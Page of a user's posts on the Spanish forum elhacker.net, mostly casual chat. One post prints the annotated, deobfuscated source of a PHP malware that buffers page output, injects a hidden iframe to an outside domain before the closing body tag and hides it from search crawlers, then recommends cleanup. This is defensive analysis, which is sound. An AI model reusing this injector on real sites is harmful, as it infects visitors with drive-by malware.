elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: También estamos presentes en BlueSky


  Mostrar Mensajes
Páginas: 1 ... 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 [43] 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 ... 101
421  Programación / PHP / Re: Virus en PHP? en: 3 Mayo 2010, 22:24 pm
Pero si me tienes ahí al lado bro ¬¬
Por lo que veo es un malware. El código del hack, con las variables sin ofuscar:

Código
  1. // Since this hack depends upon the ob_start() function, it does nothing if
  2. // ob_start() is not defined. The 'mr_no' global is a flag to ensure we only run
  3. // this code once per page.
  4.  
  5. if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
  6.  
  7.  // Set flag to indicate we've already added the hack code.
  8.  $GLOBALS['mr_no'] = 1;
  9.  
  10.  // Another duplication check
  11.  if (!function_exists('mrobh')) {
  12.  
  13.    // Define the gml() function, which returns the string with the malicious code
  14.  
  15.    if (!function_exists('gml')) {
  16.      // gml() returns malicious javascript code -unless- the requester is
  17.      // Google or Yahoo. It doesn't want the bots to see the hack because
  18.      // they'll take action on it. Here is the malicious javascript code in
  19.      // unescaped form:
  20.      //   document.write('<iframe src="http://bibzopl.com/in.php" width=1 height=1 frameborder=0></iframe>');      
  21.      function gml() {
  22.        if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
  23.          return '<script language="javascript">eval(unescape("%64%6F% [...snipped...] %29%3B"))</script>';
  24.        }
  25.        return "";
  26.      }
  27.    }
  28.  
  29.    // Ensure there is a gzdecode function. Since gzdecode is a PHP 6 function,
  30.    // we will almost always use this version. Note that this version differs
  31.    // from the PHP 6 version in that it just returns the input string if the
  32.    // string is not already gzip encoded. Thus, in PHP 6, this hack is broken
  33.    // for gzip encoded pages.
  34.  
  35.    if (!function_exists('gzdecode')) {
  36.      function gzdecode($input_str) {
  37.        // Assume it is gzip encoded and set the gzinflate start position accordingly
  38.        $ascii_third_char = @ord(@substr($input_str, 3, 1));
  39.        $start_pos = 10;
  40.        $unused_var = 0;
  41.        if ($ascii_third_char & 4) {
  42.          $tmp = @unpack('v', substr($input_str, 10, 2));
  43.          $tmp = $tmp[1];
  44.          $start_pos += 2 + $tmp;
  45.        }
  46.        if($ascii_third_char & 8) {
  47.          $start_pos = @strpos($input_str, chr(0), $start_pos) + 1;
  48.        }
  49.        if($ascii_third_char & 16) {
  50.          $start_pos = @strpos($input_str, chr(0), $start_pos) + 1;
  51.        }
  52.        if($ascii_third_char & 2) {
  53.          $start_pos += 2;
  54.        }
  55.        // Now unzip the input string. If it fails, we assume the input string
  56.        // is not compressed and just return the original input string.
  57.        $retval = @gzinflate(@substr($input_str, $start_pos));
  58.        if($retval === FALSE) {
  59.          $retval = $input_str;
  60.        }
  61.        return $retval;
  62.      }
  63.    }
  64.  
  65.    // This function takes the un-hacked page output and inserts
  66.    // the malicious code. It is configured by ob_start(), and is
  67.    // called with the buffered page text as input.
  68.  
  69.    function mrobh($page_output) {
  70.      // We are sending the output in plain text, so be sure to change the
  71.      // content encoding to indicate that.
  72.      Header('Content-Encoding: none');
  73.      // If the output is compressed, unzip it
  74.      $hacked_output = gzdecode($page_output);
  75.      // Append the malicious code at the end of the page, or just before the
  76.      // HTML </body> tag (if one exists)
  77.      if (preg_match('/\<\/body/si', $hacked_output)) {
  78.        return preg_replace('/(\<\/body[^\>]*\>)/si', gml() . "\n" . '$1', $hacked_output);
  79.      } else {
  80.        return $hacked_output . gml();
  81.      }
  82.    }
  83.  
  84.    // This statement forces output to be buffered and tells the PHP
  85.    // processor to call the mrobh() function (defined above) when
  86.    // page processing is complete.
  87.  
  88.    ob_start('mrobh');
  89.  }
  90. }
  91.  

Por lo que se ve lo que hace es ejecutar un frame como output en html, de un script en un sitio web.

Y al parecer es un troyano, lo que sugiero es, limpiar todo el sitio web, eliminando todo, y reinstalando todo, ya que pueden haber backdoors y sería nuevamente infectado el sitio.

Contacta con tu proveedor para que escaneen el servidor, y haz los respectivos cambios de seguridad, en htaccess por ejemplo, protegiendo los directorios, asignando correctamente los permisos, cambiando passwords.

Un saludo!
422  Foros Generales / Noticias / Re: Mozilla rediseña el gestor de complementos en: 3 Mayo 2010, 20:16 pm
Cada vez se parece un poco más a Opera :)
423  Foros Generales / Foro Libre / Re: Entrevista de tele5 a sdc en: 3 Mayo 2010, 20:06 pm
Citar
:http://www.pandasecurity.com/spain/promotions/retopanda/
eso de reto panda suena a uno de esos concursos chinos donde debes vencer a un panda en una pelea a muerte y de regalo te dan un panda gigante de peluche xD.

:D!
424  Foros Generales / Foro Libre / Re: Entrevista de tele5 a sdc en: 3 Mayo 2010, 18:14 pm
OMG WHK! estuviste super! ;P

No pues super SDC, poco a poco más adelante ya te harás famoso como Mitnick!
Es extraño, me explico, le muestro el video a un compañero y le digo: "-Eh eh!, yo a ese lo conozco" jeje....
425  Foros Generales / Noticias / Re: Wikipedia es acusada de distribuir pornografía infantil en: 28 Abril 2010, 21:32 pm
Oh Sanger, ¿Cómo encontraste ese contenido? imagino que estabas googleando Hentai y Pornografía infantil como para toparte con ello no? ...
426  Foros Generales / Foro Libre / Re: Canción "Drum n' bass", ¿que opinan? en: 22 Abril 2010, 01:13 am
FL Studio mejor, FrootyLoops era como se llamaba ;P
Y ese programa es re genial para hacer todas estas mezclas!
427  Foros Generales / Foro Libre / Imágenes Divertidas en: 21 Abril 2010, 04:32 am
Me llegaron al Facebook y me parecieron muy graciosas :xD se las comparto:


Jaja esta me hizo reir mucho xD







Saludos!
428  Foros Generales / Foro Libre / Re: Canción "Drum n' bass", ¿que opinan? en: 20 Abril 2010, 03:32 am
Eh que bueno!, tengo que admitir que me gustó bastante y eso que no escucho ni me gusta mucho esta "música", aún así está genial, ¿podría usarla para una intro en flash para una web? (con créditos respectivos claro) como indica en la licencia.
429  Foros Generales / Sugerencias y dudas sobre el Foro / Re: previews de paginas web (thumbs) de los links del foro en: 21 Marzo 2010, 15:44 pm
No me funciona siempre, solo a veces y parpadea, uso Opera, aunque en Chrome y Firefox sucedió lo mismo, pero, ¿esto solo funciona para usuarios o también para invitados?

Por otro lado me da igual, aunque arruinaría las bromas el 28, dando un Preview de los rickrolleos o cualquier otra cosa jaja...
430  Media / Juegos y Consolas / Re: ¿Me vale de algo una xbox 360 que esta chipeada en lugar de flasheada? en: 5 Marzo 2010, 01:54 am
Mmm depende, de que banean, tanto con chip como con el flasheado, te banearán jeje, involucran varios aspectos, el primero es la versión del dashboard, tiene que ser la última.
De por si, el hecho es jugar juegos pirateados xP... conozco personas que juegan con copias steam y me dicen que no son baneados ya que son copias casi "indetectables"... pero copias parcheadas (eso de que eran wave4 a wave3) puf, son las más baneadas...

Saludos!
Páginas: 1 ... 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 [43] 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 ... 101
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines